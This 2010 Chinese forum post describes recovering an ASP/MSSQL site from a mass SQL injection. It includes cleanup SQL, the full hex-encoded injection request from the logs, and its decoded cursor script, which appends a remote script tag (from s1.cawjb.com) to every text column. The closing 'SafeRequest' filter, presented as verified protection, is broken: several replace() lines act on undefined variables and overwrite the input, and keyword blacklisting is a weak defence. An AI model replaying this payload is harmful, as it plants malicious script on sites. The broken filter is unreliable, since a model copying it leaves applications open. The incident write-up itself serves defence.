惘城落遇 发表于 2010-9-18 11:23:33

mssql被注入js的解决办法

     发现网站后台登陆不了了,打开前台页面一看,asp页面变得惨不忍睹.
  动态显示的内容被插入了" "这样的垃圾代码.
  赶紧打开我的mssql,TMD,数据库比前台还难看.
  大概看了一下,varchar nvarchar varchar ntext,text 类型的字段都被加入的垃圾代码.
  八成是被注入了,网站页面和程序太多,难免会顾此失彼.唉~~~
  解决之道分三步走
  被注入数据库的还原
  因为表比较多,所以决定批量replace掉.
  在查询分析器里面运行下面的代码:
  varchar是你要生成替换语句的字段类型
   是垃圾代码

  SELECT 'update' AS tt, dbo.sysobjects.name, ' set ' AS tt1,
  dbo.syscolumns.name AS Expr1, '=replace( ' AS tt2, dbo.syscolumns.name AS Expr2,
  ','' '','''' ); ' AS tt3
  FROM dbo.syscolumns INNER JOIN
  dbo.sysobjects ON dbo.syscolumns.id = dbo.sysobjects.id INNER JOIN
  dbo.systypes ON dbo.syscolumns.xtype = dbo.systypes.xtype
  WHERE (dbo.sysobjects.type = 'U') AND (dbo.syscolumns.name <> 'sn') AND
  (dbo.systypes.name = 'varchar')
  复制查询出来的内容,粘贴到查询分析器上面,再执行一次
  就完成批量替换了.

  对于ntext,text的更新 用replace是不行的,查询了很多资料,发现可以用cast把它映射成varchar字段,然后替换既可,

  批量替换生成查询语句如下:
  SELECT 'update' AS tt, dbo.sysobjects.name, ' set ' AS tt1,
  dbo.syscolumns.name AS Expr1, '=replace(cast( ' AS tt2, dbo.syscolumns.name+' as varchar(8000))' AS Expr2,
  ','' '','''' ); ' AS tt3
  FROM dbo.syscolumns INNER JOIN
  dbo.sysobjects ON dbo.syscolumns.id = dbo.sysobjects.id INNER JOIN
  dbo.systypes ON dbo.syscolumns.xtype = dbo.systypes.xtype
  WHERE (dbo.sysobjects.type = 'U') AND (dbo.syscolumns.name <> 'sn') AND
  (dbo.systypes.name = 'ntext')

  查找注入点:
  分析日志吧,由于日志文件较大,有60多M,建议用写字板打开.
  呵呵,晕了吧,内容太多了.
  把横向滚动轴拖到最右边,然后拖动纵向滚动轴,看吧,因为注入代码一定是很长的,所以这样就可以方便的找到了.看吧 就是它了.看样子是做了16进制转换.

  XXasp type=1';dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F73312E6361776A622E636F6D2F6A702E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--|

  我用工具把他转换成ASC:
  推荐用(amo的编程小工具集合V1.0)
  这下看明白了吧,用游标遍历所有表里字符型数据类型的字段,然后UPDATE挂马
  真TMD够狠的.

  DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+'' ''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

  闲话少说,堵住漏洞要紧.
  堵住漏洞防止注入
  使用过了小强推荐的一个函数.
  经验证,可以有效防注入,我把这个函数加强了一下,增加了一些过滤条件.
  Function SafeRequest(ParaName,ParaType)
  Dim Paravalue
  Paravalue=Request(ParaName)
  If ParaType=1 then
  If not isNumeric(Paravalue) then
  Response.end
  End if
  Else
  Paravalue=replace(Paravalue,"VaRcHaR"," ")
  Paravalue=replace(Paravalue,"cAsT","")
  Paravalue=replace(Paravalue,"'","''")
  Paravalue=replace(dEcLaRe,"'","")
  Paravalue=replace(dEcLaRe,"'","")
  Paravalue=replace(dEcLaRe,"@","")
  Paravalue=replace(dEcLaRe,";","")
  Paravalue=replace(eXeC,";","")
  End if
  SafeRequest=Paravalue
  End function
  使用方法:
  字符型:
  hotelname= SafeRequest("hotelname",0)
  数值型:
  queryId=SafeRequest("queryId",1)
  在数据库连接文件或者其他的公用asp中加入以上函数.

  用SafeRequest代替reqeust既可.
  附,关于日志分析软件
  推荐使用logs2intrusions,可以自定义特征码,对日志批量检查.
页: [1]
查看完整版本: mssql被注入js的解决办法